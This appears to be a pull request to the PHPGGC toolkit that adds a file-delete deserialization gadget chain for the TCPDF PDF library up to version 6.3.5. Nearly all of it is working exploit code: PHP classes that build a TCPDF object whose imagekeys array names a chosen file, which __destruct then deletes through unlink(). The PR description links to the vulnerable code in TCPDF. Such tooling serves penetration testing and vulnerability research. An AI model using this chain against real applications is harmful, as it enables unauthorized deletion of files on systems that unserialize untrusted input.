### PR TITLE
Add TCPDF/FD1 gadget chain for TCPDF <= 6.3.5

### DIFF
--- a/gadgetchains/TCPDF/1/chain.php
+++ b/gadgetchains/TCPDF/1/chain.php
@@ -1,0 +1,24 @@
+<?php
+
+namespace GadgetChain\TCPDF;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '<= 6.3.5';
+    public static $vector = '__destruct';
+    public static $author = 'timoles';
+    public static $informations = '
+        TCPDF contains the varialbe "imagekeys" which excepts an array of strings. Upon __destruct an "unlink()" is called on all filepaths within the imagekeys array.';
+    public static $parameters = [
+        'remote_file'
+    ];
+
+    public function generate(array $parameters)
+    {
+        $file = $parameters['remote_file'];
+
+        return new \TCPDF(
+            $file
+        );
+    }
+}

--- a/gadgetchains/TCPDF/1/gadgets.php
+++ b/gadgetchains/TCPDF/1/gadgets.php
@@ -1,0 +1,9 @@
+<?php
+
+class TCPDF {
+    protected $imagekeys;
+    
+    function __construct($remote_file) {
+		$this->imagekeys=array($remote_file);
+	    }
+}


### PR DESCRIPTION
A PR for a file delete gadget chain for TCPDF. [TCPDF](https://github.com/tecnickcom/TCPDF) is an 

> Official clone of PHP library to generate PDF documents and barcodes

The vulnerable code within the __destruct is [here](https://github.com/tecnickcom/TCPDF/blob/main/tcpdf.php#L7788-L7792)

https://github.com/tecnickcom/TCPDF/blob/main/tcpdf.php#L7788-L7792